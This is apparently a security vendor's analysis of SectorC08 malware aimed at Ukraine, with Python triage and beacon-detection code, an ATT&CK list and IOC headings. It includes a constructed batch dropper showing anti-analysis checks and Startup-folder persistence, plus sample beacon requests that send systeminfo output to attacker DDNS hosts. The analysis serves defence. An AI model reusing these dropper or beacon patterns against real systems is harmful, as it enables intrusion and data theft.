Unlike most other state-sponsored threat actors, SectorC08 appears to be concerned with a single target: Ukraine. Artifacts of their likely activity have been found as far back as 2013, and to this day their modus operandi in the initial stages of an operation has not changed much.
We analyzed over 50 of their executable malware files collected very recently, looking for similarities, differences, and outliers. A few samples still used SectorC08's older executable structure, in which batch scripts were split out into many files (e.g. Wariables.cmd) or a batch script was bundled with a decoder executable and an encoded executable, but most followed the structure detailed below.
Example of a Typical First Stage Structure (a8f849d536481d7d8a0fa59a7bcc03dd3387ab4cc14c0342371ae295817f505c)
All samples we can confirm arrived in May and June used the same structure, described below: a 7zSFX archive which unpacks a password-protected WinRARSFX archive, which in turn runs a version of wget to download the third stage, a further SFX archive that ultimately deploys a remote administration tool such as UltraVNC.
Some of the malware samples we found contained an embedded fake document pertaining to Ukrainian issues. We observed six such embedded fake documents, some of which were reused against different targets. These documents are opened by the batch file embedded in the 7zSFX archive.
That batch file is always the file SectorC08 configures the 7zSFX archive to run on execution; it opens the fake document to distract the victim while the rest of the script performs its malicious activity.
The fake documents are always in Ukrainian and pertain to Ukrainian issues such as legal, political, military or police issues.
By comparing the date on each document with the malware's internal versioning code (described later), and drawing on our knowledge of earlier versioning codes and dates, we conclude that when the versioning code corresponds to a date it is at least a roughly accurate timestamp, which lets us build a partial timeline of events.
For example, the fake military document dated 21st May 2019 was found in three separate malware samples, where the version code “21.05” (21st May) appeared twice and “22.05” (22nd May) appeared once. Another example is the undated fake police message, where the version code “24.05” (24th May) appeared three times and “prok” and “27” appeared once each.
At the start of the batch script, the malware looks for Wireshark and Process Explorer using the tasklist command. If either is found, the script tries to bail out with a goto to a label “exit” that is never defined anywhere in the script. Because of this error in their programming logic, the check does not do everything the attacker intended.
The checks for Wireshark and Process Explorer were consistent across their malware samples. We also found isolated instances of additional checks: one sample also looked for HttpAnalyzer (9dbc77844fc3ff3565970cb09d629a710fdec3065b6e4c37b20a889c716c53bf), and an older sample from a different SectorC08 malware family also checked whether the machine's username matched a known sandbox username such as “TEQUILABOOMBOOM” or “MALWARETEST” (034fed63fc366ff3cf0137caced77a046178926c63faf1a8cd8db9d185d40821).
First Stage Persistence
In this sample, the first-stage 7zSFX archive contains the first-stage batch script (filename “18974.cmd”), a shortcut that runs “%USERPROFILE%\winver.exe -pgblfhsuyjqyst” (filename “11666”), the fake document (filename “6710”), and the second-stage WinRARSFX archive (filename “5610”). In the batch script, the second-stage executable is renamed and moved to “%USERPROFILE%\winver.exe”, and the shortcut is moved to “%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\winver.lnk” so that it is launched at every logon; the -p switch on the shortcut passes the archive password to the WinRARSFX.
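The first-stage traits described above (tasklist-based checks for analysis tools, a goto to a label that is never defined, the rename to %USERPROFILE%\winver.exe and the Startup-folder shortcut) can all be triaged statically from the .cmd file extracted out of the 7zSFX archive. The following Python is an added example, not code from the original post or from any SectorC08 sample: the embedded batch script is constructed to mirror the behaviour described for 18974.cmd, and the tool and username lists are deliberately limited to the names mentioned on this page.

```python
import re

# Constructed first-stage batch script mirroring the behaviour described for
# 18974.cmd (tool check, lure document, rename, Startup-folder shortcut).
# It is illustrative and is NOT the script from the actual sample.
SAMPLE_CMD = r"""@echo off
tasklist | find /i "wireshark" >nul && goto exit
tasklist | find /i "procexp" >nul && goto exit
if /i "%USERNAME%"=="TEQUILABOOMBOOM" goto exit
start "" 6710
move /y 5610 "%USERPROFILE%\winver.exe"
move /y 11666 "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\winver.lnk"
start "" "%USERPROFILE%\winver.exe" -pgblfhsuyjqyst
:end
"""

# Process names and sandbox usernames reported on this page (kept deliberately
# short; extend the tuples with your own lists when hunting).
ANALYSIS_TOOLS = ("wireshark", "procexp", "httpanalyzer")
SANDBOX_USERS = ("TEQUILABOOMBOOM", "MALWARETEST")

GOTO_RE = re.compile(r"\bgoto\s+:?([^\s&|]+)", re.I)
LABEL_RE = re.compile(r"^\s*:([^\s:]+)", re.M)
MOVE_RE = re.compile(r'^\s*(?:move|copy)\s+(?:/y\s+)?(\S+)\s+"?([^"\r\n]+?)"?\s*$', re.I | re.M)
STARTUP_RE = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.I)


def find_tool_checks(script):
    """Analysis tools named on the same line as a tasklist call."""
    hits = []
    for line in script.splitlines():
        low = line.lower()
        if "tasklist" not in low:
            continue
        for tool in ANALYSIS_TOOLS:
            if tool in low and tool not in hits:
                hits.append(tool)
    return hits


def find_sandbox_user_checks(script):
    """Sandbox usernames the script compares against %USERNAME%."""
    return [user for user in SANDBOX_USERS
            if re.search(r"%USERNAME%.*" + re.escape(user), script, re.I)]


def find_undefined_goto_labels(script):
    """goto targets with no matching ':label' (':eof' is built into cmd.exe)."""
    labels = {m.group(1).lower() for m in LABEL_RE.finditer(script)} | {"eof"}
    targets = {m.group(1).lower() for m in GOTO_RE.finditer(script)}
    return sorted(targets - labels)


def find_startup_persistence(script):
    """(source, destination) pairs of move/copy commands landing in a Startup folder."""
    return [(src, dst) for src, dst in MOVE_RE.findall(script)
            if STARTUP_RE.search(dst)]


def triage(script):
    """Summarise the anti-analysis and persistence traits of one batch script."""
    return {
        "tool_checks": find_tool_checks(script),
        "sandbox_user_checks": find_sandbox_user_checks(script),
        "undefined_goto_labels": find_undefined_goto_labels(script),
        "startup_persistence": find_startup_persistence(script),
    }


if __name__ == "__main__":
    for trait, value in triage(SAMPLE_CMD).items():
        print(f"{trait}: {value}")
```

Run triage() over every .cmd pulled out of a 7zSFX or WinRARSFX archive (7-Zip unpacks both without executing them). The undefined-label check surfaces the kind of logic error noted above: a goto whose target label does not exist in the script, which cmd.exe reports as a missing batch label rather than treating as the clean exit the author presumably wanted.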
Sample Second Stage (EE623D8FCF366249A381B0CB50CE6295E913F88CB0F9CB4D8116C0F3D9FA16F2)
In many recent cases, the second stage is a password-protected WinRARSFX archive containing a VBS file whose only purpose is to run batch commands via WScript, a .cmd batch file containing the commands to be run, and a renamed copy of wget.
In this example, the password used to open the second stage is “uyjqystgblfhs”. SectorC08 sometimes changes the WinRARSFX password (or simply uses an unprotected 7zSFX archive instead), but we observed this particular password at least 11 times across their various malware samples. This suggests that while they have likely automated parts of the process of building these batch scripts, much of it is still done by hand.
Second Stage Persistence and Wget
Whatever the first-stage packaging, the second stage always ends up acting as a downloader, launching one of several versions of wget to fetch the third stage.
From the sample contents, MicrosoftCreate.exe (a version of wget) is renamed and moved to “%APPDATA%\Microsoft\IE\weristotal.exe”. One scheduled task then uses weristotal.exe to download an EXE from hxxp://bitvers[.]ddns[.]net/<computerinfo>/winusers.exe, and a second scheduled task executes the downloaded file. The download task runs every 30 minutes, which matters because SectorC08's servers very often return an HTTP 403 Forbidden error instead of the requested file, so the retrieval is simply retried until a file is served.
Separately, the original MicrosoftCreate.exe also attempts to download another executable (saved as jasfix.exe in this case) from hxxp://wincreator[.]ddns[.]net/<computerinfo>/winusers.exe. Although the two wget downloads use different DDNS hostnames, both resolve to the same IP addresses and use the same file paths, so this also serves as redundancy for SectorC08.
To identify victims, the wget command sends a “comp” field (the %computername% environment variable) and a “sysinfo” field (the entire output of the systeminfo command) in its post-data. All of this is sent in the clear over HTTP.
Another interesting aspect of how they run wget is the user-agent string and the “versiya” (version) field in the post-data. About half the time the user-agent is left at wget's default; otherwise various, sometimes unusual, user-agent strings are used, which suggests that SectorC08 sometimes knows which user-agent strings are used, or likely to be used, in the victim environment.
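Because the beacon is plain HTTP with recognisable fields, it can be picked out of proxy logs or a packet capture without decrypting anything. The following Python is an added example, not code from the original post or from the samples: the three requests are constructed to mirror the shape described above (the DDNS hostnames, the winusers.exe path and the versiya values come from this page; the computer name and the systeminfo text are made up), and the only dynamic-DNS suffix it knows is the one seen here.

```python
from urllib.parse import parse_qs

# Constructed HTTP requests mirroring the wget beacon described above.
# They are illustrative and are NOT traffic captured from SectorC08 samples.
BEACON_DEFAULT_UA = (
    "POST /DESKTOP-1A2B3C/winusers.exe HTTP/1.1\r\n"
    "User-Agent: Wget/1.11.4\r\n"
    "Host: bitvers.ddns.net\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "comp=DESKTOP-1A2B3C&versiya=21.05"
    "&sysinfo=Host+Name%3A+DESKTOP-1A2B3C%0D%0AOS+Name%3A+Microsoft+Windows+7"
)
BEACON_BROWSER_UA = (
    "POST /DESKTOP-1A2B3C/winusers.exe HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0\r\n"
    "Host: wincreator.ddns.net\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "comp=DESKTOP-1A2B3C&versiya=24.05&sysinfo=OS+Name%3A+Microsoft+Windows+10"
)
BENIGN_WGET = (
    "GET /updates/check HTTP/1.1\r\n"
    "User-Agent: Wget/1.16\r\n"
    "Host: mirror.example.org\r\n"
    "\r\n"
)

DYNAMIC_DNS_SUFFIXES = (".ddns.net",)   # the only provider seen on this page


def parse_request(raw):
    """Split a raw HTTP/1.x request into method, path, headers and form fields."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    fields = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    return {"method": method, "path": path, "headers": headers, "fields": fields}


def beacon_indicators(req):
    """Traits that make one request look like the SectorC08 wget beacon."""
    hits = []
    host = req["headers"].get("host", "").lower()
    if host.endswith(DYNAMIC_DNS_SUFFIXES):
        hits.append("dynamic-dns host")
    if req["method"] == "POST" and req["path"].lower().endswith(".exe"):
        hits.append("POST for an .exe")
    if {"comp", "sysinfo"}.issubset(req["fields"]):
        hits.append("comp+sysinfo victim fields")
    if "versiya" in req["fields"]:
        hits.append("versiya field")
    if req["headers"].get("user-agent", "").startswith("Wget/"):
        hits.append("default wget user-agent")
    return hits


def is_beacon(req):
    """Victim fields alone are decisive; otherwise DDNS host and .exe POST together."""
    hits = beacon_indicators(req)
    return "comp+sysinfo victim fields" in hits or (
        "dynamic-dns host" in hits and "POST for an .exe" in hits)


def leaked_sysinfo(req):
    """Recover the 'Key: value' lines of systeminfo output carried in the beacon."""
    info = {}
    for line in req["fields"].get("sysinfo", "").splitlines():
        key, sep, value = line.partition(":")
        if sep:
            info[key.strip()] = value.strip()
    return info


if __name__ == "__main__":
    for raw in (BEACON_DEFAULT_UA, BEACON_BROWSER_UA, BENIGN_WGET):
        req = parse_request(raw)
        print(req["headers"]["host"], is_beacon(req), beacon_indicators(req))
```

The comp+sysinfo pair is treated as decisive on its own, so a sample that swaps in a browser user-agent or a fresh DDNS hostname is still caught, while a legitimate wget download with the default user-agent is not. Because the download task repeats every 30 minutes, the same request recurs from one host even when the server only ever answers 403, which makes the beacon easy to confirm once a single hit is found.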
| Version code (versiya) | User-Agent |
| --- | --- |
| 07.05 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) Safari/537.36 |
| 13.05 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0 |
| 13.05 | Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) Safari/604.1 |
| 21.05 | Mozilla/5.0 (Linux; Android 5.1; Neffos C5 Build/LMY47D) Mobile Safari/537.36 |
| 21.05 | Mozilla/5.0 (X11; Linux x86_64) Safari/537.36 |
| 23.05 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0 |
| 23.05 | Mozilla/5.0 (Windows NT 10.0) Safari/537.36 OPR/54.0.2952.64 |
| 24.05 | Mozilla/5.0 (Linux; Android 8.0.0; SM-G955F Build/R16NW) Safari/537.36 |
| 24.05 | Mozilla/5.0 (Windows NT 5.1) Chrome/49.0.2623.112 |
| U_04 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0 |
| USB_04 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0 |
| USB_07 | Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0 |
| USB_08 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0 |
| %1_401 | Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36 OPR/54.0.2952.64 |
| osb | Mozilla/5.0 (Windows NT 10.0; Win64; x64) Safari/537.36 |
Additionally, if a proxy is configured under “HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings” (the “ProxyServer”, “ProxyUser” and “ProxyPass” values), those values are passed to a second invocation of wget as the http_proxy setting and the --proxy-user and --proxy-password options, so the download still works from behind an authenticating corporate proxy.
In total we observed six different versions of wget being used by SectorC08 recently, which appear to be different builds of GNU Wget 1.11.4 and GNU Wget 1.16.
Stage 3 and 4 – UltraVNC
The file downloaded by wget is the stage 3 binary: another 7zSFX archive, this time containing a password-protected WinRARSFX archive that deploys UltraVNC for remote administration. Using UltraVNC for unauthorized remote administration is a tactic SectorC08 has relied on for many years.
SectorC08 is a threat group focused on Ukraine and has been targeting it for many years. That their tactics have changed so little over that time suggests they have achieved at least some success in their operations. From a technical standpoint their custom malware may look unsophisticated, since these samples require little skill to build, but through creative use of various versions of open-source utilities, and by varying static details such as the 7zSFX and WinRARSFX versions used to build their executables and even the icon of every file, they have consistently achieved low detection rates from security products and are likely to continue to do so.
Indicators of Compromise
wget utilities (SHA-256)
Embedded Lure Documents
MITRE ATT&CK Techniques
The following MITRE ATT&CK techniques were observed in our analysis of these malware samples.
Initial Access
T1091 Replication Through Removable Media
T1193 Spearphishing Attachment
Execution
T1059 Command-Line Interface
T1053 Scheduled Task
T1204 User Execution
T1047 Windows Management Instrumentation
Persistence
T1158 Hidden Files and Directories
T1060 Registry Run Keys / Startup Folder
T1053 Scheduled Task
T1023 Shortcut Modification
Defense Evasion
T1158 Hidden Files and Directories
T1027 Obfuscated Files or Information
Discovery
T1057 Process Discovery
T1012 Query Registry
T1082 System Information Discovery
T1016 System Network Configuration Discovery
T1124 System Time Discovery
T1497 Virtualization/Sandbox Evasion
Command and Control
T1043 Commonly Used Port
T1065 Uncommonly Used Port
T1219 Remote Access Tools
T1071 Standard Application Layer Protocol